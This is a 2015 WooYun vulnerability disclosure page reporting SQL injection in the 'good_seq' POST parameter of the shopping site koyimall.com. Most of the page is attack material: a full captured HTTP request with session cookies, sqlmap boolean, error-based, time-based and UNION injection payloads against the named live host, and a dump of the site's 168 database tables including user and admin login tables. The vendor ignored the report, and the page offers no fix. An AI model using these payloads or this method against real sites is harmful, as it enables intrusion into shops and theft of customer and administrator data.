当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140603

漏洞标题:韩尚聚post注入一枚

相关厂商:koyimall.com

漏洞作者: 路人甲

提交时间:2015-09-12 12:55

修复时间:2015-09-17 12:56

公开时间:2015-09-17 12:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-12: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

你懂得

详细说明:

POST /?act=shop.goods_view&GS=202845&GC=GD00 HTTP/1.1
Host: www.koyimall.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://www.koyimall.com/?act=shop.goods_view&GS=202845&GC=GD00
Cookie: _ga=GA1.2.789240266.1441536364; lzstat_uv=28985152881159708506|3314588; Hm_lvt_f054d4659617a26eee16da122a9d036b=1441590333,1441770152,1441770157,1441977737; PHPSESSID=U11212204-164728861955f2d57c2a; lzstat_ss=638839446_18_1442006737_3314588; _gat=1; goods_list=%2F%3Fact%3Dshop.goods_list%26GC%3DGD00%26ST%3DSCODE1; Hm_lpvt_f054d4659617a26eee16da122a9d036b=1441977938; POPUP_DATA=-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
act=shop.cart_act&mode=BUY&good_seq=202845&good_price=249&reurl=&good_cate=GD00&good_option_set%5B%5D=&good_option_set%5B%5D=&cart_count=1


参数 good_seq
你懂得

漏洞证明:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: good_seq (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=shop.cart_act&mode=BUY&good_seq=202845 AND 2520=2520&good_price
=249&reurl=&good_cate=GD00&good_option_set[]=&good_option_set[]=&cart_count=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: act=shop.cart_act&mode=BUY&good_seq=202845 AND (SELECT 4151 FROM(SE
LECT COUNT(*),CONCAT(0x71766b6271,(SELECT (ELT(4151=4151,1))),0x71706b7871,FLOOR
(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&good_price=24
9&reurl=&good_cate=GD00&good_option_set[]=&good_option_set[]=&cart_count=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: act=shop.cart_act&mode=BUY&good_seq=202845 AND (SELECT * FROM (SELE
CT(SLEEP(5)))YxAX)&good_price=249&reurl=&good_cate=GD00&good_option_set[]=&good_
option_set[]=&cart_count=1
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: act=shop.cart_act&mode=BUY&good_seq=202845 UNION ALL SELECT NULL,CO
NCAT(0x71766b6271,0x59717577746261525468,0x71706b7871)-- &good_price=249&reurl=&
good_cate=GD00&good_option_set[]=&good_option_set[]=&cart_count=1
---
[21:34:05] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.5
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] koyimall
[*] test
Database: koyimall
[168 tables]
+---------------------------------+
| alipay_login |
| durian_admin |
| durian_admin_auth |
| durian_admin_login |
| durian_admin_memo |
| durian_admin_menu |
| durian_admin_postit |
| durian_bank |
| durian_banner |
| durian_banner_click |
| durian_bbs_category |
| durian_bbs_comment |
| durian_bbs_data |
| durian_bbs_file |
| durian_bbs_setup |
| durian_bbs_vote |
| durian_buy |
| durian_buy_bill |
| durian_buy_change_log |
| durian_buy_claim |
| durian_buy_claim_goods |
| durian_buy_excel |
| durian_buy_excel_ext |
| durian_buy_ext |
| durian_buy_ext_set |
| durian_buy_goods |
| durian_buy_goods_status_log |
| durian_buy_recommend |
| durian_buy_stat |
| durian_calendar |
| durian_cart |
| durian_country |
| durian_coupon |
| durian_coupon_data |
| durian_coupon_file |
| durian_coupon_goods |
| durian_coupon_goods_give |
| durian_coupon_log |
| durian_coupon_policy |
| durian_customer_qna |
| durian_customer_qna_category |
| durian_customer_qna_reply |
| durian_delivery_area |
| durian_delivery_company |
| durian_delivery_cost |
| durian_delivery_cost_area |
| durian_delivery_extra |
| durian_delivery_policy |
| durian_delivery_policy_range |
| durian_design_flash |
| durian_design_font |
| durian_design_keyword |
| durian_design_layout |
| durian_design_module |
| durian_design_module_current |
| durian_design_module_reserve |
| durian_design_module_set |
| durian_design_module_set_bbs |
| durian_design_module_set_data |
| durian_design_page |
| durian_design_policy |
| durian_design_source |
| durian_design_tpl |
| durian_estimate |
| durian_estimate_goods |
| durian_event |
| durian_event_goods |
| durian_form_category |
| durian_form_data |
| durian_form_set |
| durian_form_setup |
| durian_good_brand |
| durian_good_category |
| durian_good_category_multi |
| durian_good_category_related |
| durian_good_category_style |
| durian_good_category_taobao |
| durian_good_check_option |
| durian_good_extend |
| durian_good_fabric_tip |
| durian_good_fabric_tip_title |
| durian_good_file |
| durian_good_main |
| durian_good_main_list |
| durian_good_maker |
| durian_good_option_grid |
| durian_good_option_grid_value |
| durian_good_option_set |
| durian_good_option_set_list |
| durian_good_option_set_value |
| durian_good_option_single |
| durian_good_option_single_value |
| durian_good_policy |
| durian_good_related |
| durian_good_stat |
| durian_good_tmp |
| durian_good_view |
| durian_goods |
| durian_icon |
| durian_icon_group |
| durian_keyword |
| durian_keyword_stat |
| durian_mail_auto |
| durian_mail_policy |
| durian_mail_result |
| durian_mail_send |
| durian_mail_tpl |
| durian_mail_tpl_category |
| durian_market_group |
| durian_market_group_log |
| durian_memo_policy |
| durian_memo_recv |
| durian_memo_send |
| durian_memo_tpl |
| durian_mileage_log |
| durian_mileage_pay |
| durian_mileage_policy |
| durian_pay |
| durian_point_log |
| durian_point_policy |
| durian_poll |
| durian_poll_answer |
| durian_poll_comment |
| durian_poll_vote |
| durian_popup |
| durian_popup_tpl |
| durian_redbean |
| durian_sf_barcode |
| durian_shop |
| durian_shop_account |
| durian_shop_company |
| durian_shop_domain |
| durian_shop_policy |
| durian_sms_auto |
| durian_sms_policy |
| durian_sms_result |
| durian_sms_send |
| durian_sms_tpl |
| durian_sms_tpl_category |
| durian_stat_check |
| durian_talk |
| durian_talk_policy |
| durian_user |
| durian_user_address |
| durian_user_deny |
| durian_user_join_ext |
| durian_user_join_policy |
| durian_user_level |
| durian_user_levelup_log |
| durian_user_login |
| durian_user_privacy |
| durian_user_provision |
| durian_user_recommend |
| durian_user_secede |
| durian_user_secede_poll |
| durian_user_secede_poll_data |
| durian_user_stat |
| durian_wish_list |
| durian_zipcode |
| gmay_gift_event |
| main_banner_info |
| main_banner_prd_info |
| main_plan_info |
| main_ranking_info |
| pay_alipay_return |
| pay_mileage_return |
| ranking_info |
| ranking_temp_info |
| durian_user_login | 136143 |

修复方案:

我不懂

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-17 12:56

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无